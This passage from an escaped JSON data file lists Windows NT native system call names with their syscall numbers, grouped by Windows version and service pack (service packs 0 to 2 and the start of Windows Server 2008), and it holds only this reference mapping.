358, \"NtSetSecurityObject\": 359, \"NtSetSystemEnvironmentValue\": 360, \"NtSetSystemEnvironmentValueEx\": 361, \"NtSetSystemInformation\": 362, \"NtSetSystemPowerState\": 363, \"NtSetSystemTime\": 364, \"NtSetThreadExecutionState\": 365, \"NtSetTimerResolution\": 366, \"NtSetUuidSeed\": 367, \"NtSetVolumeInformationFile\": 368, \"NtShutdownSystem\": 369, \"NtShutdownWorkerFactory\": 370, \"NtSignalAndWaitForSingleObject\": 371, \"NtSinglePhaseReject\": 372, \"NtStartProfile\": 373, \"NtStartTm\": 374, \"NtStopProfile\": 375, \"NtSuspendProcess\": 376, \"NtSuspendThread\": 377, \"NtSystemDebugControl\": 378, \"NtTerminateJobObject\": 379, \"NtTestAlert\": 380, \"NtThawRegistry\": 381, \"NtThawTransactions\": 382, \"NtTraceControl\": 383, \"NtTranslateFilePath\": 384, \"NtUnloadDriver\": 385, \"NtUnloadKey\": 386, \"NtUnloadKey2\": 387, \"NtUnloadKeyEx\": 388, \"NtUnlockFile\": 389, \"NtUnlockVirtualMemory\": 390, \"NtVdmControl\": 391, \"NtWaitForDebugEvent\": 392, \"NtWaitForKeyedEvent\": 393, \"NtWaitForWorkViaWorkerFactory\": 394, \"NtWaitHighEventPair\": 395, \"NtWaitLowEventPair\": 396, \"NtWorkerFactoryWorkerReady\": 397}, \"SP1\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAcquireCMFViewOwnership\": 102, \"NtAddBootEntry\": 103, \"NtAddDriverEntry\": 104, \"NtAdjustGroupsToken\": 105, \"NtAlertResumeThread\": 106, \"NtAlertThread\": 107, \"NtAllocateLocallyUniqueId\": 108, \"NtAllocateUserPhysicalPages\": 109, \"NtAllocateUuids\": 110, \"NtAlpcAcceptConnectPort\": 111, \"NtAlpcCancelMessage\": 112, \"NtAlpcConnectPort\": 113, \"NtAlpcCreatePort\": 114, \"NtAlpcCreatePortSection\": 115, \"NtAlpcCreateResourceReserve\": 116, \"NtAlpcCreateSectionView\": 117, \"NtAlpcCreateSecurityContext\": 118, \"NtAlpcDeletePortSection\": 119, \"NtAlpcDeleteResourceReserve\": 120, \"NtAlpcDeleteSectionView\": 121, \"NtAlpcDeleteSecurityContext\": 122, \"NtAlpcDisconnectPort\": 123, \"NtAlpcImpersonateClientOfPort\": 124, \"NtAlpcOpenSenderProcess\": 125, \"NtAlpcOpenSenderThread\": 126, \"NtAlpcQueryInformation\": 127, \"NtAlpcQueryInformationMessage\": 128, \"NtAlpcRevokeSecurityContext\": 129, \"NtAlpcSendWaitReceivePort\": 130, \"NtAlpcSetInformation\": 131, \"NtAreMappedFilesTheSame\": 132, \"NtAssignProcessToJobObject\": 133, \"NtCancelDeviceWakeupRequest\": 134, \"NtCancelIoFileEx\": 135, \"NtCancelSynchronousIoFile\": 136, \"NtCommitComplete\": 137, \"NtCommitEnlistment\": 138, \"NtCommitTransaction\": 139, \"NtCompactKeys\": 140, \"NtCompareTokens\": 141, \"NtCompleteConnectPort\": 142, \"NtCompressKey\": 143, \"NtConnectPort\": 144, \"NtCreateDebugObject\": 145, \"NtCreateDirectoryObject\": 146, \"NtCreateEnlistment\": 147, \"NtCreateEventPair\": 148, \"NtCreateIoCompletion\": 149, \"NtCreateJobObject\": 150, \"NtCreateJobSet\": 151, \"NtCreateKeyTransacted\": 152, \"NtCreateKeyedEvent\": 153, \"NtCreateMailslotFile\": 154, \"NtCreateMutant\": 155, \"NtCreateNamedPipeFile\": 156, \"NtCreatePagingFile\": 157, \"NtCreatePort\": 158, \"NtCreatePrivateNamespace\": 159, \"NtCreateProcess\": 160, \"NtCreateProfile\": 161, \"NtCreateResourceManager\": 162, \"NtCreateSemaphore\": 163, \"NtCreateSymbolicLinkObject\": 164, \"NtCreateThreadEx\": 165, \"NtCreateTimer\": 166, \"NtCreateToken\": 167, \"NtCreateTransaction\": 168, \"NtCreateTransactionManager\": 169, \"NtCreateUserProcess\": 170, \"NtCreateWaitablePort\": 171, \"NtCreateWorkerFactory\": 172, \"NtDebugActiveProcess\": 173, \"NtDebugContinue\": 174, \"NtDeleteAtom\": 175, \"NtDeleteBootEntry\": 176, \"NtDeleteDriverEntry\": 177, \"NtDeleteFile\": 178, \"NtDeleteKey\": 179, \"NtDeleteObjectAuditAlarm\": 180, \"NtDeletePrivateNamespace\": 181, \"NtDeleteValueKey\": 182, \"NtDisplayString\": 183, \"NtEnumerateBootEntries\": 184, \"NtEnumerateDriverEntries\": 185, \"NtEnumerateSystemEnvironmentValuesEx\": 186, \"NtEnumerateTransactionObject\": 187, \"NtExtendSection\": 188, \"NtFilterToken\": 189, \"NtFlushInstallUILanguage\": 190, \"NtFlushInstructionCache\": 191, \"NtFlushKey\": 192, \"NtFlushProcessWriteBuffers\": 193, \"NtFlushVirtualMemory\": 194, \"NtFlushWriteBuffer\": 195, \"NtFreeUserPhysicalPages\": 196, \"NtFreezeRegistry\": 197, \"NtFreezeTransactions\": 198, \"NtGetContextThread\": 199, \"NtGetCurrentProcessorNumber\": 200, \"NtGetDevicePowerState\": 201, \"NtGetMUIRegistryInfo\": 202, \"NtGetNextProcess\": 203, \"NtGetNextThread\": 204, \"NtGetNlsSectionPtr\": 205, \"NtGetNotificationResourceManager\": 206, \"NtGetPlugPlayEvent\": 207, \"NtGetWriteWatch\": 208, \"NtImpersonateAnonymousToken\": 209, \"NtImpersonateThread\": 210, \"NtInitializeNlsFiles\": 211, \"NtInitializeRegistry\": 212, \"NtInitiatePowerAction\": 213, \"NtIsSystemResumeAutomatic\": 214, \"NtIsUILanguageComitted\": 215, \"NtListenPort\": 216, \"NtLoadDriver\": 217, \"NtLoadKey\": 218, \"NtLoadKey2\": 219, \"NtLoadKeyEx\": 220, \"NtLockFile\": 221, \"NtLockProductActivationKeys\": 222, \"NtLockRegistryKey\": 223, \"NtLockVirtualMemory\": 224, \"NtMakePermanentObject\": 225, \"NtMakeTemporaryObject\": 226, \"NtMapCMFModule\": 227, \"NtMapUserPhysicalPages\": 228, \"NtModifyBootEntry\": 229, \"NtModifyDriverEntry\": 230, \"NtNotifyChangeDirectoryFile\": 231, \"NtNotifyChangeKey\": 232, \"NtNotifyChangeMultipleKeys\": 233, \"NtOpenEnlistment\": 234, \"NtOpenEventPair\": 235, \"NtOpenIoCompletion\": 236, \"NtOpenJobObject\": 237, \"NtOpenKeyTransacted\": 238, \"NtOpenKeyedEvent\": 239, \"NtOpenMutant\": 240, \"NtOpenObjectAuditAlarm\": 241, \"NtOpenPrivateNamespace\": 242, \"NtOpenProcessToken\": 243, \"NtOpenResourceManager\": 244, \"NtOpenSemaphore\": 245, \"NtOpenSession\": 246, \"NtOpenSymbolicLinkObject\": 247, \"NtOpenThread\": 248, \"NtOpenTimer\": 249, \"NtOpenTransaction\": 250, \"NtOpenTransactionManager\": 251, \"NtPlugPlayControl\": 252, \"NtPrePrepareComplete\": 253, \"NtPrePrepareEnlistment\": 254, \"NtPrepareComplete\": 255, \"NtPrepareEnlistment\": 256, \"NtPrivilegeCheck\": 257, \"NtPrivilegeObjectAuditAlarm\": 258, \"NtPrivilegedServiceAuditAlarm\": 259, \"NtPropagationComplete\": 260, \"NtPropagationFailed\": 261, \"NtPulseEvent\": 262, \"NtQueryBootEntryOrder\": 263, \"NtQueryBootOptions\": 264, \"NtQueryDebugFilterState\": 265, \"NtQueryDirectoryObject\": 266, \"NtQueryDriverEntryOrder\": 267, \"NtQueryEaFile\": 268, \"NtQueryFullAttributesFile\": 269, \"NtQueryInformationAtom\": 270, \"NtQueryInformationEnlistment\": 271, \"NtQueryInformationJobObject\": 272, \"NtQueryInformationPort\": 273, \"NtQueryInformationResourceManager\": 274, \"NtQueryInformationTransaction\": 275, \"NtQueryInformationTransactionManager\": 276, \"NtQueryInformationWorkerFactory\": 277, \"NtQueryInstallUILanguage\": 278, \"NtQueryIntervalProfile\": 279, \"NtQueryIoCompletion\": 280, \"NtQueryLicenseValue\": 281, \"NtQueryMultipleValueKey\": 282, \"NtQueryMutant\": 283, \"NtQueryOpenSubKeys\": 284, \"NtQueryOpenSubKeysEx\": 285, \"NtQueryPortInformationProcess\": 286, \"NtQueryQuotaInformationFile\": 287, \"NtQuerySecurityObject\": 288, \"NtQuerySemaphore\": 289, \"NtQuerySymbolicLinkObject\": 290, \"NtQuerySystemEnvironmentValue\": 291, \"NtQuerySystemEnvironmentValueEx\": 292, \"NtQueryTimerResolution\": 293, \"NtRaiseException\": 294, \"NtRaiseHardError\": 295, \"NtReadOnlyEnlistment\": 296, \"NtRecoverEnlistment\": 297, \"NtRecoverResourceManager\": 298, \"NtRecoverTransactionManager\": 299, \"NtRegisterProtocolAddressInformation\": 300, \"NtRegisterThreadTerminatePort\": 301, \"NtReleaseCMFViewOwnership\": 302, \"NtReleaseKeyedEvent\": 303, \"NtReleaseWorkerFactoryWorker\": 304, \"NtRemoveIoCompletionEx\": 305, \"NtRemoveProcessDebug\": 306, \"NtRenameKey\": 307, \"NtRenameTransactionManager\": 308, \"NtReplaceKey\": 309, \"NtReplacePartitionUnit\": 310, \"NtReplyWaitReplyPort\": 311, \"NtRequestDeviceWakeup\": 312, \"NtRequestPort\": 313, \"NtRequestWakeupLatency\": 314, \"NtResetEvent\": 315, \"NtResetWriteWatch\": 316, \"NtRestoreKey\": 317, \"NtResumeProcess\": 318, \"NtRollbackComplete\": 319, \"NtRollbackEnlistment\": 320, \"NtRollbackTransaction\": 321, \"NtRollforwardTransactionManager\": 322, \"NtSaveKey\": 323, \"NtSaveKeyEx\": 324, \"NtSaveMergedKeys\": 325, \"NtSecureConnectPort\": 326, \"NtSetBootEntryOrder\": 327, \"NtSetBootOptions\": 328, \"NtSetContextThread\": 329, \"NtSetDebugFilterState\": 330, \"NtSetDefaultHardErrorPort\": 331, \"NtSetDefaultLocale\": 332, \"NtSetDefaultUILanguage\": 333, \"NtSetDriverEntryOrder\": 334, \"NtSetEaFile\": 335, \"NtSetHighEventPair\": 336, \"NtSetHighWaitLowEventPair\": 337, \"NtSetInformationDebugObject\": 338, \"NtSetInformationEnlistment\": 339, \"NtSetInformationJobObject\": 340, \"NtSetInformationKey\": 341, \"NtSetInformationResourceManager\": 342, \"NtSetInformationToken\": 343, \"NtSetInformationTransaction\": 344, \"NtSetInformationTransactionManager\": 345, \"NtSetInformationWorkerFactory\": 346, \"NtSetIntervalProfile\": 347, \"NtSetIoCompletion\": 348, \"NtSetLdtEntries\": 349, \"NtSetLowEventPair\": 350, \"NtSetLowWaitHighEventPair\": 351, \"NtSetQuotaInformationFile\": 352, \"NtSetSecurityObject\": 353, \"NtSetSystemEnvironmentValue\": 354, \"NtSetSystemEnvironmentValueEx\": 355, \"NtSetSystemInformation\": 356, \"NtSetSystemPowerState\": 357, \"NtSetSystemTime\": 358, \"NtSetThreadExecutionState\": 359, \"NtSetTimerResolution\": 360, \"NtSetUuidSeed\": 361, \"NtSetVolumeInformationFile\": 362, \"NtShutdownSystem\": 363, \"NtShutdownWorkerFactory\": 364, \"NtSignalAndWaitForSingleObject\": 365, \"NtSinglePhaseReject\": 366, \"NtStartProfile\": 367, \"NtStopProfile\": 368, \"NtSuspendProcess\": 369, \"NtSuspendThread\": 370, \"NtSystemDebugControl\": 371, \"NtTerminateJobObject\": 372, \"NtTestAlert\": 373, \"NtThawRegistry\": 374, \"NtThawTransactions\": 375, \"NtTraceControl\": 376, \"NtTranslateFilePath\": 377, \"NtUnloadDriver\": 378, \"NtUnloadKey\": 379, \"NtUnloadKey2\": 380, \"NtUnloadKeyEx\": 381, \"NtUnlockFile\": 382, \"NtUnlockVirtualMemory\": 383, \"NtVdmControl\": 384, \"NtWaitForDebugEvent\": 385, \"NtWaitForKeyedEvent\": 386, \"NtWaitForWorkViaWorkerFactory\": 387, \"NtWaitHighEventPair\": 388, \"NtWaitLowEventPair\": 389, \"NtWorkerFactoryWorkerReady\": 390}, \"SP2\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAcquireCMFViewOwnership\": 102, \"NtAddBootEntry\": 103, \"NtAddDriverEntry\": 104, \"NtAdjustGroupsToken\": 105, \"NtAlertResumeThread\": 106, \"NtAlertThread\": 107, \"NtAllocateLocallyUniqueId\": 108, \"NtAllocateUserPhysicalPages\": 109, \"NtAllocateUuids\": 110, \"NtAlpcAcceptConnectPort\": 111, \"NtAlpcCancelMessage\": 112, \"NtAlpcConnectPort\": 113, \"NtAlpcCreatePort\": 114, \"NtAlpcCreatePortSection\": 115, \"NtAlpcCreateResourceReserve\": 116, \"NtAlpcCreateSectionView\": 117, \"NtAlpcCreateSecurityContext\": 118, \"NtAlpcDeletePortSection\": 119, \"NtAlpcDeleteResourceReserve\": 120, \"NtAlpcDeleteSectionView\": 121, \"NtAlpcDeleteSecurityContext\": 122, \"NtAlpcDisconnectPort\": 123, \"NtAlpcImpersonateClientOfPort\": 124, \"NtAlpcOpenSenderProcess\": 125, \"NtAlpcOpenSenderThread\": 126, \"NtAlpcQueryInformation\": 127, \"NtAlpcQueryInformationMessage\": 128, \"NtAlpcRevokeSecurityContext\": 129, \"NtAlpcSendWaitReceivePort\": 130, \"NtAlpcSetInformation\": 131, \"NtAreMappedFilesTheSame\": 132, \"NtAssignProcessToJobObject\": 133, \"NtCancelDeviceWakeupRequest\": 134, \"NtCancelIoFileEx\": 135, \"NtCancelSynchronousIoFile\": 136, \"NtCommitComplete\": 137, \"NtCommitEnlistment\": 138, \"NtCommitTransaction\": 139, \"NtCompactKeys\": 140, \"NtCompareTokens\": 141, \"NtCompleteConnectPort\": 142, \"NtCompressKey\": 143, \"NtConnectPort\": 144, \"NtCreateDebugObject\": 145, \"NtCreateDirectoryObject\": 146, \"NtCreateEnlistment\": 147, \"NtCreateEventPair\": 148, \"NtCreateIoCompletion\": 149, \"NtCreateJobObject\": 150, \"NtCreateJobSet\": 151, \"NtCreateKeyTransacted\": 152, \"NtCreateKeyedEvent\": 153, \"NtCreateMailslotFile\": 154, \"NtCreateMutant\": 155, \"NtCreateNamedPipeFile\": 156, \"NtCreatePagingFile\": 157, \"NtCreatePort\": 158, \"NtCreatePrivateNamespace\": 159, \"NtCreateProcess\": 160, \"NtCreateProfile\": 161, \"NtCreateResourceManager\": 162, \"NtCreateSemaphore\": 163, \"NtCreateSymbolicLinkObject\": 164, \"NtCreateThreadEx\": 165, \"NtCreateTimer\": 166, \"NtCreateToken\": 167, \"NtCreateTransaction\": 168, \"NtCreateTransactionManager\": 169, \"NtCreateUserProcess\": 170, \"NtCreateWaitablePort\": 171, \"NtCreateWorkerFactory\": 172, \"NtDebugActiveProcess\": 173, \"NtDebugContinue\": 174, \"NtDeleteAtom\": 175, \"NtDeleteBootEntry\": 176, \"NtDeleteDriverEntry\": 177, \"NtDeleteFile\": 178, \"NtDeleteKey\": 179, \"NtDeleteObjectAuditAlarm\": 180, \"NtDeletePrivateNamespace\": 181, \"NtDeleteValueKey\": 182, \"NtDisplayString\": 183, \"NtEnumerateBootEntries\": 184, \"NtEnumerateDriverEntries\": 185, \"NtEnumerateSystemEnvironmentValuesEx\": 186, \"NtEnumerateTransactionObject\": 187, \"NtExtendSection\": 188, \"NtFilterToken\": 189, \"NtFlushInstallUILanguage\": 190, \"NtFlushInstructionCache\": 191, \"NtFlushKey\": 192, \"NtFlushProcessWriteBuffers\": 193, \"NtFlushVirtualMemory\": 194, \"NtFlushWriteBuffer\": 195, \"NtFreeUserPhysicalPages\": 196, \"NtFreezeRegistry\": 197, \"NtFreezeTransactions\": 198, \"NtGetContextThread\": 199, \"NtGetCurrentProcessorNumber\": 200, \"NtGetDevicePowerState\": 201, \"NtGetMUIRegistryInfo\": 202, \"NtGetNextProcess\": 203, \"NtGetNextThread\": 204, \"NtGetNlsSectionPtr\": 205, \"NtGetNotificationResourceManager\": 206, \"NtGetPlugPlayEvent\": 207, \"NtGetWriteWatch\": 208, \"NtImpersonateAnonymousToken\": 209, \"NtImpersonateThread\": 210, \"NtInitializeNlsFiles\": 211, \"NtInitializeRegistry\": 212, \"NtInitiatePowerAction\": 213, \"NtIsSystemResumeAutomatic\": 214, \"NtIsUILanguageComitted\": 215, \"NtListenPort\": 216, \"NtLoadDriver\": 217, \"NtLoadKey\": 218, \"NtLoadKey2\": 219, \"NtLoadKeyEx\": 220, \"NtLockFile\": 221, \"NtLockProductActivationKeys\": 222, \"NtLockRegistryKey\": 223, \"NtLockVirtualMemory\": 224, \"NtMakePermanentObject\": 225, \"NtMakeTemporaryObject\": 226, \"NtMapCMFModule\": 227, \"NtMapUserPhysicalPages\": 228, \"NtModifyBootEntry\": 229, \"NtModifyDriverEntry\": 230, \"NtNotifyChangeDirectoryFile\": 231, \"NtNotifyChangeKey\": 232, \"NtNotifyChangeMultipleKeys\": 233, \"NtOpenEnlistment\": 234, \"NtOpenEventPair\": 235, \"NtOpenIoCompletion\": 236, \"NtOpenJobObject\": 237, \"NtOpenKeyTransacted\": 238, \"NtOpenKeyedEvent\": 239, \"NtOpenMutant\": 240, \"NtOpenObjectAuditAlarm\": 241, \"NtOpenPrivateNamespace\": 242, \"NtOpenProcessToken\": 243, \"NtOpenResourceManager\": 244, \"NtOpenSemaphore\": 245, \"NtOpenSession\": 246, \"NtOpenSymbolicLinkObject\": 247, \"NtOpenThread\": 248, \"NtOpenTimer\": 249, \"NtOpenTransaction\": 250, \"NtOpenTransactionManager\": 251, \"NtPlugPlayControl\": 252, \"NtPrePrepareComplete\": 253, \"NtPrePrepareEnlistment\": 254, \"NtPrepareComplete\": 255, \"NtPrepareEnlistment\": 256, \"NtPrivilegeCheck\": 257, \"NtPrivilegeObjectAuditAlarm\": 258, \"NtPrivilegedServiceAuditAlarm\": 259, \"NtPropagationComplete\": 260, \"NtPropagationFailed\": 261, \"NtPulseEvent\": 262, \"NtQueryBootEntryOrder\": 263, \"NtQueryBootOptions\": 264, \"NtQueryDebugFilterState\": 265, \"NtQueryDirectoryObject\": 266, \"NtQueryDriverEntryOrder\": 267, \"NtQueryEaFile\": 268, \"NtQueryFullAttributesFile\": 269, \"NtQueryInformationAtom\": 270, \"NtQueryInformationEnlistment\": 271, \"NtQueryInformationJobObject\": 272, \"NtQueryInformationPort\": 273, \"NtQueryInformationResourceManager\": 274, \"NtQueryInformationTransaction\": 275, \"NtQueryInformationTransactionManager\": 276, \"NtQueryInformationWorkerFactory\": 277, \"NtQueryInstallUILanguage\": 278, \"NtQueryIntervalProfile\": 279, \"NtQueryIoCompletion\": 280, \"NtQueryLicenseValue\": 281, \"NtQueryMultipleValueKey\": 282, \"NtQueryMutant\": 283, \"NtQueryOpenSubKeys\": 284, \"NtQueryOpenSubKeysEx\": 285, \"NtQueryPortInformationProcess\": 286, \"NtQueryQuotaInformationFile\": 287, \"NtQuerySecurityObject\": 288, \"NtQuerySemaphore\": 289, \"NtQuerySymbolicLinkObject\": 290, \"NtQuerySystemEnvironmentValue\": 291, \"NtQuerySystemEnvironmentValueEx\": 292, \"NtQueryTimerResolution\": 293, \"NtRaiseException\": 294, \"NtRaiseHardError\": 295, \"NtReadOnlyEnlistment\": 296, \"NtRecoverEnlistment\": 297, \"NtRecoverResourceManager\": 298, \"NtRecoverTransactionManager\": 299, \"NtRegisterProtocolAddressInformation\": 300, \"NtRegisterThreadTerminatePort\": 301, \"NtReleaseCMFViewOwnership\": 302, \"NtReleaseKeyedEvent\": 303, \"NtReleaseWorkerFactoryWorker\": 304, \"NtRemoveIoCompletionEx\": 305, \"NtRemoveProcessDebug\": 306, \"NtRenameKey\": 307, \"NtRenameTransactionManager\": 308, \"NtReplaceKey\": 309, \"NtReplacePartitionUnit\": 310, \"NtReplyWaitReplyPort\": 311, \"NtRequestDeviceWakeup\": 312, \"NtRequestPort\": 313, \"NtRequestWakeupLatency\": 314, \"NtResetEvent\": 315, \"NtResetWriteWatch\": 316, \"NtRestoreKey\": 317, \"NtResumeProcess\": 318, \"NtRollbackComplete\": 319, \"NtRollbackEnlistment\": 320, \"NtRollbackTransaction\": 321, \"NtRollforwardTransactionManager\": 322, \"NtSaveKey\": 323, \"NtSaveKeyEx\": 324, \"NtSaveMergedKeys\": 325, \"NtSecureConnectPort\": 326, \"NtSetBootEntryOrder\": 327, \"NtSetBootOptions\": 328, \"NtSetContextThread\": 329, \"NtSetDebugFilterState\": 330, \"NtSetDefaultHardErrorPort\": 331, \"NtSetDefaultLocale\": 332, \"NtSetDefaultUILanguage\": 333, \"NtSetDriverEntryOrder\": 334, \"NtSetEaFile\": 335, \"NtSetHighEventPair\": 336, \"NtSetHighWaitLowEventPair\": 337, \"NtSetInformationDebugObject\": 338, \"NtSetInformationEnlistment\": 339, \"NtSetInformationJobObject\": 340, \"NtSetInformationKey\": 341, \"NtSetInformationResourceManager\": 342, \"NtSetInformationToken\": 343, \"NtSetInformationTransaction\": 344, \"NtSetInformationTransactionManager\": 345, \"NtSetInformationWorkerFactory\": 346, \"NtSetIntervalProfile\": 347, \"NtSetIoCompletion\": 348, \"NtSetLdtEntries\": 349, \"NtSetLowEventPair\": 350, \"NtSetLowWaitHighEventPair\": 351, \"NtSetQuotaInformationFile\": 352, \"NtSetSecurityObject\": 353, \"NtSetSystemEnvironmentValue\": 354, \"NtSetSystemEnvironmentValueEx\": 355, \"NtSetSystemInformation\": 356, \"NtSetSystemPowerState\": 357, \"NtSetSystemTime\": 358, \"NtSetThreadExecutionState\": 359, \"NtSetTimerResolution\": 360, \"NtSetUuidSeed\": 361, \"NtSetVolumeInformationFile\": 362, \"NtShutdownSystem\": 363, \"NtShutdownWorkerFactory\": 364, \"NtSignalAndWaitForSingleObject\": 365, \"NtSinglePhaseReject\": 366, \"NtStartProfile\": 367, \"NtStopProfile\": 368, \"NtSuspendProcess\": 369, \"NtSuspendThread\": 370, \"NtSystemDebugControl\": 371, \"NtTerminateJobObject\": 372, \"NtTestAlert\": 373, \"NtThawRegistry\": 374, \"NtThawTransactions\": 375, \"NtTraceControl\": 376, \"NtTranslateFilePath\": 377, \"NtUnloadDriver\": 378, \"NtUnloadKey\": 379, \"NtUnloadKey2\": 380, \"NtUnloadKeyEx\": 381, \"NtUnlockFile\": 382, \"NtUnlockVirtualMemory\": 383, \"NtVdmControl\": 384, \"NtWaitForDebugEvent\": 385, \"NtWaitForKeyedEvent\": 386, \"NtWaitForWorkViaWorkerFactory\": 387, \"NtWaitHighEventPair\": 388, \"NtWaitLowEventPair\": 389, \"NtWorkerFactoryWorkerReady\": 390}}, \"Windows Server 2008\": {\"SP0\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, 